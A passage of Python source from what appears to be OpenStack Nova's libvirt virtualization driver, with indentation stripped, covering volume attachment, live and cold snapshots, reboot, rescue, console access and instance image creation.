"""Returns all LVM disks for given instance object."""
if CONF.libvirt_images_volume_group:
vg = os.path.join('/dev', CONF.libvirt_images_volume_group)
if not os.path.exists(vg):
return []
pattern = '%s_' % instance['name']
def belongs_to_instance(disk):
return disk.startswith(pattern)
def fullpath(name):
return os.path.join(vg, name)
logical_volumes = libvirt_utils.list_logical_volumes(vg)
disk_names = filter(belongs_to_instance, logical_volumes)
disks = map(fullpath, disk_names)
return disks
return []
def get_volume_connector(self, instance):
if not self._initiator:
self._initiator = libvirt_utils.get_iscsi_initiator()
if not self._initiator:
LOG.debug(_('Could not determine iscsi initiator name'),
instance=instance)
if not self._fc_wwnns:
self._fc_wwnns = libvirt_utils.get_fc_wwnns()
if not self._fc_wwnns or len(self._fc_wwnns) == 0:
LOG.debug(_('Could not determine fibre channel '
'world wide node names'),
instance=instance)
if not self._fc_wwpns:
self._fc_wwpns = libvirt_utils.get_fc_wwpns()
if not self._fc_wwpns or len(self._fc_wwpns) == 0:
LOG.debug(_('Could not determine fibre channel '
'world wide port names'),
instance=instance)
if not self._initiator and not self._fc_wwnns and not self._fc_wwpns:
msg = _("No Volume Connector found.")
LOG.error(msg)
raise exception.NovaException(msg)
connector = {'ip': CONF.my_ip,
'initiator': self._initiator,
'host': CONF.host}
if self._fc_wwnns and self._fc_wwpns:
connector["wwnns"] = self._fc_wwnns
connector["wwpns"] = self._fc_wwpns
return connector
def _cleanup_resize(self, instance, network_info):
target = libvirt_utils.get_instance_path(instance) + "_resize"
if os.path.exists(target):
shutil.rmtree(target)
if instance['host'] != CONF.host:
self._undefine_domain(instance)
self.unplug_vifs(instance, network_info)
self.firewall_driver.unfilter_instance(instance, network_info)
def volume_driver_method(self, method_name, connection_info,
*args, **kwargs):
driver_type = connection_info.get('driver_volume_type')
if driver_type not in self.volume_drivers:
raise exception.VolumeDriverNotFound(driver_type=driver_type)
driver = self.volume_drivers[driver_type]
method = getattr(driver, method_name)
return method(connection_info, *args, **kwargs)
def attach_volume(self, connection_info, instance, mountpoint):
instance_name = instance['name']
virt_dom = self._lookup_by_name(instance_name)
disk_dev = mountpoint.rpartition("/")[2]
disk_info = {
'dev': disk_dev,
'bus': blockinfo.get_disk_bus_for_disk_dev(CONF.libvirt_type,
disk_dev),
'type': 'disk',
}
conf = self.volume_driver_method('connect_volume',
connection_info,
disk_info)
self.set_cache_mode(conf)
try:
# NOTE(vish): We can always affect config because our
# domains are persistent, but we should only
# affect live if the domain is running.
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.attachDeviceFlags(conf.to_xml(), flags)
except Exception, ex:
if isinstance(ex, libvirt.libvirtError):
errcode = ex.get_error_code()
if errcode == libvirt.VIR_ERR_OPERATION_FAILED:
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
raise exception.DeviceIsBusy(device=disk_dev)
with excutils.save_and_reraise_exception():
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
@staticmethod
def _get_disk_xml(xml, device):
"""Returns the xml for the disk mounted at device."""
try:
doc = etree.fromstring(xml)
except Exception:
return None
ret = doc.findall('./devices/disk')
for node in ret:
for child in node.getchildren():
if child.tag == 'target':
if child.get('dev') == device:
return etree.tostring(node)
def _get_existing_domain_xml(self, instance, network_info,
block_device_info=None):
try:
virt_dom = self._lookup_by_name(instance['name'])
xml = virt_dom.XMLDesc(0)
except exception.InstanceNotFound:
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info)
xml = self.to_xml(instance, network_info, disk_info,
block_device_info=block_device_info)
return xml
def detach_volume(self, connection_info, instance, mountpoint):
instance_name = instance['name']
disk_dev = mountpoint.rpartition("/")[2]
try:
virt_dom = self._lookup_by_name(instance_name)
xml = self._get_disk_xml(virt_dom.XMLDesc(0), disk_dev)
if not xml:
raise exception.DiskNotFound(location=disk_dev)
else:
# NOTE(vish): We can always affect config because our
# domains are persistent, but we should only
# affect live if the domain is running.
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.detachDeviceFlags(xml, flags)
except libvirt.libvirtError as ex:
# NOTE(vish): This is called to cleanup volumes after live
# migration, so we should still disconnect even if
# the instance doesn't exist here anymore.
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
# NOTE(vish):
LOG.warn(_("During detach_volume, instance disappeared."))
else:
raise
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
@exception.wrap_exception()
def attach_interface(self, instance, image_meta, network_info):
virt_dom = self._lookup_by_name(instance['name'])
for (network, mapping) in network_info:
self.vif_driver.plug(instance, (network, mapping))
self.firewall_driver.setup_basic_filtering(instance,
[(network, mapping)])
cfg = self.vif_driver.get_config(instance, network, mapping,
image_meta)
try:
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.attachDeviceFlags(cfg.to_xml(), flags)
except libvirt.libvirtError as ex:
LOG.error(_('attaching network adapter failed.'),
instance=instance)
self.vif_driver.unplug(instance, (network, mapping))
raise exception.InterfaceAttachFailed(instance)
@exception.wrap_exception()
def detach_interface(self, instance, network_info):
virt_dom = self._lookup_by_name(instance['name'])
for (network, mapping) in network_info:
cfg = self.vif_driver.get_config(instance, network, mapping, None)
try:
self.vif_driver.unplug(instance, (network, mapping))
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.detachDeviceFlags(cfg.to_xml(), flags)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
LOG.warn(_("During detach_interface, "
"instance disappeared."),
instance=instance)
else:
LOG.error(_('detaching network adapter failed.'),
instance=instance)
raise exception.InterfaceDetachFailed(instance)
def snapshot(self, context, instance, image_href, update_task_state):
"""Create snapshot from a running VM instance.
This command only works with qemu 0.14+
"""
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.InstanceNotFound:
raise exception.InstanceNotRunning(instance_id=instance['uuid'])
(image_service, image_id) = glance.get_remote_image_service(
context, instance['image_ref'])
try:
base = image_service.show(context, image_id)
except exception.ImageNotFound:
base = {}
_image_service = glance.get_remote_image_service(context, image_href)
snapshot_image_service, snapshot_image_id = _image_service
snapshot = snapshot_image_service.show(context, snapshot_image_id)
metadata = {'is_public': False,
'status': 'active',
'name': snapshot['name'],
'properties': {
'kernel_id': instance['kernel_id'],
'image_location': 'snapshot',
'image_state': 'available',
'owner_id': instance['project_id'],
'ramdisk_id': instance['ramdisk_id'],
}
}
if 'architecture' in base.get('properties', {}):
arch = base['properties']['architecture']
metadata['properties']['architecture'] = arch
disk_path = libvirt_utils.find_disk(virt_dom)
source_format = libvirt_utils.get_disk_type(disk_path)
image_format = CONF.snapshot_image_format or source_format
# NOTE(bfilippov): save lvm as raw
if image_format == 'lvm':
image_format = 'raw'
# NOTE(vish): glance forces ami disk format to be ami
if base.get('disk_format') == 'ami':
metadata['disk_format'] = 'ami'
else:
metadata['disk_format'] = image_format
metadata['container_format'] = base.get('container_format', 'bare')
snapshot_name = uuid.uuid4().hex
(state, _max_mem, _mem, _cpus, _t) = virt_dom.info()
state = LIBVIRT_POWER_STATE[state]
# NOTE(rmk): Live snapshots require QEMU 1.3 and Libvirt 1.0.0.
# These restrictions can be relaxed as other configurations
# can be validated.
if self.has_min_version(MIN_LIBVIRT_LIVESNAPSHOT_VERSION,
MIN_QEMU_LIVESNAPSHOT_VERSION,
REQ_HYPERVISOR_LIVESNAPSHOT) \
and not source_format == "lvm":
live_snapshot = True
else:
live_snapshot = False
# NOTE(rmk): We cannot perform live snapshots when a managedSave
# file is present, so we will use the cold/legacy method
# for instances which are shutdown.
if state == power_state.SHUTDOWN:
live_snapshot = False
# NOTE(dkang): managedSave does not work for LXC
if CONF.libvirt_type != 'lxc' and not live_snapshot:
if state == power_state.RUNNING or state == power_state.PAUSED:
virt_dom.managedSave(0)
snapshot_backend = self.image_backend.snapshot(disk_path,
snapshot_name,
image_type=source_format)
if live_snapshot:
LOG.info(_("Beginning live snapshot process"),
instance=instance)
else:
LOG.info(_("Beginning cold snapshot process"),
instance=instance)
snapshot_backend.snapshot_create()
update_task_state(task_state=task_states.IMAGE_PENDING_UPLOAD)
snapshot_directory = CONF.libvirt_snapshots_directory
fileutils.ensure_tree(snapshot_directory)
with utils.tempdir(dir=snapshot_directory) as tmpdir:
try:
out_path = os.path.join(tmpdir, snapshot_name)
if live_snapshot:
# NOTE (rmk): libvirt needs to be able to write to the
# temp directory, which is owned nova.
utils.execute('chmod', '777', tmpdir, run_as_root=True)
self._live_snapshot(virt_dom, disk_path, out_path,
image_format)
else:
snapshot_backend.snapshot_extract(out_path, image_format)
finally:
if not live_snapshot:
snapshot_backend.snapshot_delete()
# NOTE(dkang): because previous managedSave is not called
# for LXC, _create_domain must not be called.
if CONF.libvirt_type != 'lxc' and not live_snapshot:
if state == power_state.RUNNING:
self._create_domain(domain=virt_dom)
elif state == power_state.PAUSED:
self._create_domain(domain=virt_dom,
launch_flags=libvirt.VIR_DOMAIN_START_PAUSED)
LOG.info(_("Snapshot extracted, beginning image upload"),
instance=instance)
# Upload that image to the image service
update_task_state(task_state=task_states.IMAGE_UPLOADING,
expected_state=task_states.IMAGE_PENDING_UPLOAD)
with libvirt_utils.file_open(out_path) as image_file:
image_service.update(context,
image_href,
metadata,
image_file)
LOG.info(_("Snapshot image upload complete"),
instance=instance)
def _live_snapshot(self, domain, disk_path, out_path, image_format):
"""Snapshot an instance without downtime."""
# Save a copy of the domain's running XML file
xml = domain.XMLDesc(0)
# Abort is an idempotent operation, so make sure any block
# jobs which may have failed are ended.
try:
domain.blockJobAbort(disk_path, 0)
except Exception:
pass
def _wait_for_block_job(domain, disk_path):
status = domain.blockJobInfo(disk_path, 0)
try:
cur = status.get('cur', 0)
end = status.get('end', 0)
except Exception:
return False
if cur == end and cur != 0 and end != 0:
return False
else:
return True
# NOTE (rmk): We are using shallow rebases as a workaround to a bug
# in QEMU 1.3. In order to do this, we need to create
# a destination image with the original backing file
# and matching size of the instance root disk.
src_disk_size = libvirt_utils.get_disk_size(disk_path)
src_back_path = libvirt_utils.get_disk_backing_file(disk_path,
basename=False)
disk_delta = out_path + '.delta'
libvirt_utils.create_cow_image(src_back_path, disk_delta,
src_disk_size)
try:
# NOTE (rmk): blockRebase cannot be executed on persistent
# domains, so we need to temporarily undefine it.
# If any part of this block fails, the domain is
# re-defined regardless.
if domain.isPersistent():
domain.undefine()
# NOTE (rmk): Establish a temporary mirror of our root disk and
# issue an abort once we have a complete copy.
domain.blockRebase(disk_path, disk_delta, 0,
libvirt.VIR_DOMAIN_BLOCK_REBASE_COPY |
libvirt.VIR_DOMAIN_BLOCK_REBASE_REUSE_EXT |
libvirt.VIR_DOMAIN_BLOCK_REBASE_SHALLOW)
while _wait_for_block_job(domain, disk_path):
time.sleep(0.5)
domain.blockJobAbort(disk_path, 0)
libvirt_utils.chown(disk_delta, os.getuid())
finally:
self._conn.defineXML(xml)
# Convert the delta (CoW) image with a backing file to a flat
# image with no backing file.
libvirt_utils.extract_snapshot(disk_delta, 'qcow2', None,
out_path, image_format)
def reboot(self, context, instance, network_info, reboot_type='SOFT',
block_device_info=None):
"""Reboot a virtual machine, given an instance reference."""
if reboot_type == 'SOFT':
# NOTE(vish): This will attempt to do a graceful shutdown/restart.
if self._soft_reboot(instance):
LOG.info(_("Instance soft rebooted successfully."),
instance=instance)
return
else:
LOG.warn(_("Failed to soft reboot instance."),
instance=instance)
return self._hard_reboot(context, instance, network_info,
block_device_info)
def _soft_reboot(self, instance):
"""Attempt to shutdown and restart the instance gracefully.
We use shutdown and create here so we can return if the guest
responded and actually rebooted. Note that this method only
succeeds if the guest responds to acpi. Therefore we return
success or failure so we can fall back to a hard reboot if
necessary.
:returns: True if the reboot succeeded
"""
dom = self._lookup_by_name(instance["name"])
(state, _max_mem, _mem, _cpus, _t) = dom.info()
state = LIBVIRT_POWER_STATE[state]
old_domid = dom.ID()
# NOTE(vish): This check allows us to reboot an instance that
# is already shutdown.
if state == power_state.RUNNING:
dom.shutdown()
# NOTE(vish): This actually could take slighty longer than the
# FLAG defines depending on how long the get_info
# call takes to return.
for x in xrange(CONF.libvirt_wait_soft_reboot_seconds):
dom = self._lookup_by_name(instance["name"])
(state, _max_mem, _mem, _cpus, _t) = dom.info()
state = LIBVIRT_POWER_STATE[state]
new_domid = dom.ID()
if state in [power_state.SHUTDOWN,
power_state.CRASHED]:
LOG.info(_("Instance shutdown successfully."),
instance=instance)
self._create_domain(domain=dom)
timer = utils.FixedIntervalLoopingCall(self._wait_for_running,
instance)
timer.start(interval=0.5).wait()
return True
elif old_domid != new_domid:
LOG.info(_("Instance may have been rebooted during soft "
"reboot, so return now."), instance=instance)
return True
greenthread.sleep(1)
return False
def _hard_reboot(self, context, instance, network_info,
block_device_info=None):
"""Reboot a virtual machine, given an instance reference.
Performs a Libvirt reset (if supported) on the domain.
If Libvirt reset is unavailable this method actually destroys and
re-creates the domain to ensure the reboot happens, as the guest
OS cannot ignore this action.
If xml is set, it uses the passed in xml in place of the xml from the
existing domain.
"""
self._destroy(instance)
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info)
xml = self.to_xml(instance, network_info, disk_info,
block_device_info=block_device_info,
write_to_disk=True)
# NOTE (rmk): Re-populate any missing backing files.
disk_info_json = self.get_instance_disk_info(instance['name'], xml)
self._create_images_and_backing(context, instance, disk_info_json)
# Initialize all the necessary networking, block devices and
# start the instance.
self._create_domain_and_network(xml, instance, network_info,
block_device_info)
def _wait_for_reboot():
"""Called at an interval until the VM is running again."""
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_("Instance rebooted successfully."),
instance=instance)
raise utils.LoopingCallDone()
timer = utils.FixedIntervalLoopingCall(_wait_for_reboot)
timer.start(interval=0.5).wait()
def pause(self, instance):
"""Pause VM instance."""
dom = self._lookup_by_name(instance['name'])
dom.suspend()
def unpause(self, instance):
"""Unpause paused VM instance."""
dom = self._lookup_by_name(instance['name'])
dom.resume()
def power_off(self, instance):
"""Power off the specified instance."""
self._destroy(instance)
def power_on(self, instance):
"""Power on the specified instance."""
dom = self._lookup_by_name(instance['name'])
self._create_domain(domain=dom, instance=instance)
timer = utils.FixedIntervalLoopingCall(self._wait_for_running,
instance)
timer.start(interval=0.5).wait()
def suspend(self, instance):
"""Suspend the specified instance."""
dom = self._lookup_by_name(instance['name'])
dom.managedSave(0)
def resume(self, instance, network_info, block_device_info=None):
"""resume the specified instance."""
xml = self._get_existing_domain_xml(instance, network_info,
block_device_info)
self._create_domain_and_network(xml, instance, network_info,
block_device_info)
def resume_state_on_host_boot(self, context, instance, network_info,
block_device_info=None):
"""resume guest state when a host is booted."""
# Check if the instance is running already and avoid doing
# anything if it is.
if self.instance_exists(instance['name']):
domain = self._lookup_by_name(instance['name'])
state = LIBVIRT_POWER_STATE[domain.info()[0]]
ignored_states = (power_state.RUNNING,
power_state.SUSPENDED,
power_state.PAUSED)
if state in ignored_states:
return
# Instance is not up and could be in an unknown state.
# Be as absolute as possible about getting it back into
# a known and running state.
self._hard_reboot(context, instance, network_info, block_device_info)
def rescue(self, context, instance, network_info, image_meta,
rescue_password):
"""Loads a VM using rescue images.
A rescue is normally performed when something goes wrong with the
primary images and data needs to be corrected/recovered. Rescuing
should not edit or over-ride the original image, only allow for
data recovery.
"""
instance_dir = libvirt_utils.get_instance_path(instance)
unrescue_xml = self._get_existing_domain_xml(instance, network_info)
unrescue_xml_path = os.path.join(instance_dir, 'unrescue.xml')
libvirt_utils.write_to_file(unrescue_xml_path, unrescue_xml)
rescue_images = {
'image_id': CONF.rescue_image_id or instance['image_ref'],
'kernel_id': CONF.rescue_kernel_id or instance['kernel_id'],
'ramdisk_id': CONF.rescue_ramdisk_id or instance['ramdisk_id'],
}
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
None,
image_meta,
rescue=True)
xml = self.to_xml(instance, network_info, disk_info,
image_meta, rescue=rescue_images)
self._create_image(context, instance, xml,
disk_info['mapping'],
'.rescue', rescue_images,
network_info=network_info,
admin_pass=rescue_password)
self._destroy(instance)
self._create_domain(xml)
def unrescue(self, instance, network_info):
"""Reboot the VM which is being rescued back into primary images.
"""
instance_dir = libvirt_utils.get_instance_path(instance)
unrescue_xml_path = os.path.join(instance_dir, 'unrescue.xml')
xml = libvirt_utils.load_file(unrescue_xml_path)
virt_dom = self._lookup_by_name(instance['name'])
self._destroy(instance)
self._create_domain(xml, virt_dom)
libvirt_utils.file_delete(unrescue_xml_path)
rescue_files = os.path.join(instance_dir, "*.rescue")
for rescue_file in glob.iglob(rescue_files):
libvirt_utils.file_delete(rescue_file)
def poll_rebooting_instances(self, timeout, instances):
pass
def _enable_hairpin(self, xml):
interfaces = self.get_interfaces(xml)
for interface in interfaces:
utils.execute('tee',
'/sys/class/net/%s/brport/hairpin_mode' % interface,
process_input='1',
run_as_root=True,
check_exit_code=[0, 1])
# NOTE(ilyaalekseyev): Implementation like in multinics
# for xenapi(tr3buchet)
def spawn(self, context, instance, image_meta, injected_files,
admin_password, network_info=None, block_device_info=None):
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info,
image_meta)
xml = self.to_xml(instance, network_info,
disk_info, image_meta,
block_device_info=block_device_info)
self._create_image(context, instance, xml,
disk_info['mapping'],
network_info=network_info,
block_device_info=block_device_info,
files=injected_files,
admin_pass=admin_password)
self._create_domain_and_network(xml, instance, network_info,
block_device_info)
LOG.debug(_("Instance is running"), instance=instance)
def _wait_for_boot():
"""Called at an interval until the VM is running."""
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_("Instance spawned successfully."),
instance=instance)
raise utils.LoopingCallDone()
timer = utils.FixedIntervalLoopingCall(_wait_for_boot)
timer.start(interval=0.5).wait()
def _flush_libvirt_console(self, pty):
out, err = utils.execute('dd',
'if=%s' % pty,
'iflag=nonblock',
run_as_root=True,
check_exit_code=False)
return out
def _append_to_file(self, data, fpath):
LOG.info(_('data: %(data)r, fpath: %(fpath)r') % locals())
fp = open(fpath, 'a+')
fp.write(data)
return fpath
def get_console_output(self, instance):
virt_dom = self._lookup_by_name(instance['name'])
xml = virt_dom.XMLDesc(0)
tree = etree.fromstring(xml)
console_types = {}
# NOTE(comstud): We want to try 'file' types first, then try 'pty'
# types. We can't use Python 2.7 syntax of:
# tree.find("./devices/console[@type='file']/source")
# because we need to support 2.6.
console_nodes = tree.findall('./devices/console')
for console_node in console_nodes:
console_type = console_node.get('type')
console_types.setdefault(console_type, [])
console_types[console_type].append(console_node)
# If the guest has a console logging to a file prefer to use that
if console_types.get('file'):
for file_console in console_types.get('file'):
source_node = file_console.find('./source')
if source_node is None:
continue
path = source_node.get("path")
if not path:
continue
libvirt_utils.chown(path, os.getuid())
with libvirt_utils.file_open(path, 'rb') as fp:
log_data, remaining = utils.last_bytes(fp,
MAX_CONSOLE_BYTES)
if remaining > 0:
LOG.info(_('Truncated console log returned, %d bytes '
'ignored'), remaining, instance=instance)
return log_data
# Try 'pty' types
if console_types.get('pty'):
for pty_console in console_types.get('pty'):
source_node = pty_console.find('./source')
if source_node is None:
continue
pty = source_node.get("path")
if not pty:
continue
break
else:
msg = _("Guest does not have a console available")
raise exception.NovaException(msg)
self._chown_console_log_for_instance(instance)
data = self._flush_libvirt_console(pty)
console_log = self._get_console_log_path(instance)
fpath = self._append_to_file(data, console_log)
with libvirt_utils.file_open(fpath, 'rb') as fp:
log_data, remaining = utils.last_bytes(fp, MAX_CONSOLE_BYTES)
if remaining > 0:
LOG.info(_('Truncated console log returned, %d bytes ignored'),
remaining, instance=instance)
return log_data
@staticmethod
def get_host_ip_addr():
return CONF.my_ip
def get_vnc_console(self, instance):
def get_vnc_port_for_instance(instance_name):
virt_dom = self._lookup_by_name(instance_name)
xml = virt_dom.XMLDesc(0)
# TODO(sleepsonthefloor): use etree instead of minidom
dom = minidom.parseString(xml)
for graphic in dom.getElementsByTagName('graphics'):
if graphic.getAttribute('type') == 'vnc':
return graphic.getAttribute('port')
port = get_vnc_port_for_instance(instance['name'])
host = CONF.vncserver_proxyclient_address
return {'host': host, 'port': port, 'internal_access_path': None}
@exception.wrap_exception()
def get_spice_console(self, instance):
def get_spice_ports_for_instance(instance_name):
virt_dom = self._lookup_by_name(instance_name)
xml = virt_dom.XMLDesc(0)
# TODO(sleepsonthefloor): use etree instead of minidom
dom = minidom.parseString(xml)
for graphic in dom.getElementsByTagName('graphics'):
if graphic.getAttribute('type') == 'spice':
return (graphic.getAttribute('port'),
graphic.getAttribute('tlsPort'))
return (None, None)
ports = get_spice_ports_for_instance(instance['name'])
host = CONF.spice.server_proxyclient_address
return {'host': host, 'port': ports[0],
'tlsPort': ports[1], 'internal_access_path': None}
@staticmethod
def _supports_direct_io(dirpath):
if not hasattr(os, 'O_DIRECT'):
LOG.debug("This python runtime does not support direct I/O")
return False
testfile = os.path.join(dirpath, ".directio.test")
hasDirectIO = True
try:
f = os.open(testfile, os.O_CREAT | os.O_WRONLY | os.O_DIRECT)
os.close(f)
LOG.debug(_("Path '%(path)s' supports direct I/O") %
{'path': dirpath})
except OSError, e:
if e.errno == errno.EINVAL:
LOG.debug(_("Path '%(path)s' does not support direct I/O: "
"'%(ex)s'") % {'path': dirpath, 'ex': str(e)})
hasDirectIO = False
else:
with excutils.save_and_reraise_exception():
LOG.error(_("Error on '%(path)s' while checking "
"direct I/O: '%(ex)s'") %
{'path': dirpath, 'ex': str(e)})
except Exception, e:
with excutils.save_and_reraise_exception():
LOG.error(_("Error on '%(path)s' while checking direct I/O: "
"'%(ex)s'") % {'path': dirpath, 'ex': str(e)})
finally:
try:
os.unlink(testfile)
except Exception:
pass
return hasDirectIO
@staticmethod
def _create_local(target, local_size, unit='G',
fs_format=None, label=None):
"""Create a blank image of specified size."""
if not fs_format:
fs_format = CONF.default_ephemeral_format
if not CONF.libvirt_images_type == "lvm":
libvirt_utils.create_image('raw', target,
'%d%c' % (local_size, unit))
if fs_format:
utils.mkfs(fs_format, target, label)
def _create_ephemeral(self, target, ephemeral_size, fs_label, os_type):
self._create_local(target, ephemeral_size)
disk.mkfs(os_type, fs_label, target)
@staticmethod
def _create_swap(target, swap_mb):
"""Create a swap file of specified size."""
libvirt_utils.create_image('raw', target, '%dM' % swap_mb)
utils.mkfs('swap', target)
@staticmethod
def _get_console_log_path(instance):
return os.path.join(libvirt_utils.get_instance_path(instance),
'console.log')
def _chown_console_log_for_instance(self, instance):
console_log = self._get_console_log_path(instance)
if os.path.exists(console_log):
libvirt_utils.chown(console_log, os.getuid())
def _create_image(self, context, instance, libvirt_xml,
disk_mapping, suffix='',
disk_images=None, network_info=None,
block_device_info=None, files=None, admin_pass=None):
if not suffix:
suffix = ''
booted_from_volume = (
(not bool(instance.get('image_ref')))
or 'disk' not in disk_mapping
)
# syntactic nicety
def basepath(fname='', suffix=suffix):
return os.path.join(libvirt_utils.get_instance_path(instance),
fname + suffix)
def image(fname, image_type=CONF.libvirt_images_type):
return self.image_backend.image(instance,
fname + suffix, image_type)
def raw(fname):
return image(fname, image_type='raw')
# ensure directories exist and are writable
fileutils.ensure_tree(basepath(suffix=''))
LOG.info(_('Creating image'), instance=instance)
libvirt_utils.write_to_file(basepath('libvirt.xml'), libvirt_xml)
# NOTE(dprince): for rescue console.log may already exist... chown it.
self._chown_console_log_for_instance(instance)
# NOTE(vish): No need add the suffix to console.log
libvirt_utils.write_to_file(
self._get_console_log_path(instance), '', 007)
if not disk_images:
disk_images = {'image_id': instance['image_ref'],
'kernel_id': instance['kernel_id'],
'ramdisk_id': instance['ramdisk_id']}
if disk_images['kernel_id']:
fname = imagecache.get_cache_fname(disk_images, 'kernel_id')
raw('kernel').cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=fname,
image_id=disk_images['kernel_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
if disk_images['ramdisk_id']:
fname = imagecache.get_cache_fname(disk_images, 'ramdisk_id')
raw('ramdisk').cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=fname,
image_id=disk_images['ramdisk_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
inst_type = instance_types.extract_instance_type(instance)
# NOTE(ndipanov): Even if disk_mapping was passed in, which
# currently happens only on rescue - we still don't want to
# create a base image.
if not booted_from_volume:
root_fname = imagecache.get_cache_fname(disk_images, 'image_id')
size = instance['root_gb'] * 1024 * 1024 * 1024
if size == 0 or suffix == '.rescue':
size = None
image('disk').cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=root_fname,
size=size,
image_id=disk_images['image_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
# Lookup the filesystem type if required
os_type_with_default = instance['os_type']
if not os_type_with_default:
os_type_with_default = 'default'
ephemeral_gb = instance['ephemeral_gb']
if 'disk.local' in disk_mapping:
fn = functools.partial(self._create_ephemeral,
fs_label='ephemeral0',
os_type=instance["os_type"])
fname = "ephemeral_%s_%s" % (ephemeral_gb, os_type_with_default)
size = ephemeral_gb * 1024 * 1024 * 1024
image('disk.local').cache(fetch_func=fn,
filename=fname,
size=size,
ephemeral_size=ephemeral_gb)
for eph in driver.block_device_info_get_ephemerals(block_device_info):
fn = functools.partial(self._create_ephemeral,
fs_label='ephemeral%d' % eph['num'],
os_type=instance["os_type"])
size = eph['size'] * 1024 * 1024 * 1024
fname = "ephemeral_%s_%s" % (eph['size'], os_type_with_default)
image(blockinfo.get_eph_disk(eph)).cache(
fetch_func=fn,
filename=fname,
size=size,
ephemeral_size=eph['size'])
if 'disk.swap' in disk_mapping:
mapping = disk_mapping['disk.swap']
swap_mb = 0
swap = driver.block_device_info_get_swap(block_device_info)
if driver.swap_is_usable(swap):
swap_mb = swap['swap_size']
elif (inst_type['swap'] > 0 and
not block_device.volume_in_mapping(
mapping['dev'], block_device_info)):
swap_mb = inst_type['swap']
if swap_mb > 0:
size = swap_mb * 1024 * 1024
image('disk.swap').cache(fetch_func=self._create_swap,
filename="swap_%s" % swap_mb,
size=size,
swap_mb=swap_mb)
# Config drive
if configdrive.required_by(instance):
LOG.info(_('Using config drive'), instance=instance)
extra_md = {}
if admin_pass:
extra_md['admin_pass'] = admin_pass
inst_md = instance_metadata.InstanceMetadata(instance,
content=files, extra_md=extra_md)
with configdrive.ConfigDriveBuilder(instance_md=inst_md) as cdb:
configdrive_path = basepath(fname='disk.config')
LOG.info(_('Creating config drive at %(path)s'),
{'path': configdrive_path}, instance=instance)
try:
cdb.make_drive(configdrive_path)
except exception.ProcessExecutionError, e:
with excutils.save_and_reraise_exception():
LOG.error(_('Creating config drive failed '
'with error: %s'),
e, instance=instance)
# File injection
elif CONF.libvirt_inject_partition != -2:
target_partition = None
if not instance['kernel_id']:
target_partition = CONF.libvirt_inject_partition
if target_partition == 0:
target_partition = None
if CONF.libvirt_type == 'lxc':
target_partition = None
if CONF.libvirt_inject_key and instance['key_data']:
key = str(instance['key_data'])
else:
key = None
net = netutils.get_injected_network_template(network_info)
metadata = instance.get('metadata')
if not CONF.libvirt_inject_password:
admin_pass = None
if any((key, net, metadata, admin_pass, files)):
# If we're not using config_drive, inject into root fs
injection_path = image('disk').path
img_id = instance['image_ref']
for inj in ('key', 'net', 'metadata', 'admin_pass', 'files'):
if locals()[inj]:
LOG.info(_('Injecting %(inj)s into image '
'%(img_id)s'), locals(), instance=instance)
try:
disk.inject_data(injection_path,
key, net, metadata, admin_pass, files,
partition=target_partition,
use_cow=CONF.use_cow_images,
mandatory=('files',))
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_('Error injecting data into image '
'%(img_id)s (%(e)s)') % locals(),
instance=instance)
if CONF.libvirt_type == 'uml':
libvirt_utils.chown(image('disk').path, 'root')
def get_host_capabilities(self):
"""Returns an instance of config.LibvirtConfigCaps representing
the capabilities of the host"""
if not self._caps:
xmlstr = self._conn.getCapabilities()
self._caps = vconfig.LibvirtConfigCaps()
self._caps.parse_str(xmlstr)
return self._caps
def get_host_uuid(self):
"""Returns a UUID representing the host."""
caps = self.get_host_capabilities()
return caps.host.uuid
def get_host_cpu_for_guest(self):
"""Returns an instance of config.LibvirtConfigGuestCPU
representing the host's CPU model & topology with
policy for configuring a guest to match"""
caps = self.get_host_capabilities()
hostcpu = caps.host.cpu
guestcpu = vconfig.LibvirtConfigGuestCPU()
guestcpu.model = hostcpu.model
guestcpu.vendor = hostcpu.vendor
guestcpu.arch = hostcpu.arch
guestcpu.match = "exact"
for hostfeat in hostcpu.features:
guestfeat = vconfig.LibvirtConfigGuestCPUFeature(hostfeat.name)
guestfeat.policy = "require"
guestcpu.features.append(guestfeat)
return guestcpu
def get_guest_cpu_config(self):
mode = CONF.libvirt_cpu_mode
model = CONF.libvirt_cpu_model
if mode is None:
if CONF.libvirt_type == "kvm" or CONF.libvirt_type == "qemu":
mode = "host-model"
else:
mode = "none"
if mode == "none":
return None
if CONF.libvirt_type != "kvm" and CONF.libvirt_type != "qemu":
msg = _("Config requested an explicit CPU model, but "
"the current libvirt hypervisor '%s' does not "
"support selecting CPU models") % CONF.libvirt_type
raise exception.Invalid(msg)
if mode == "custom" and model is None:
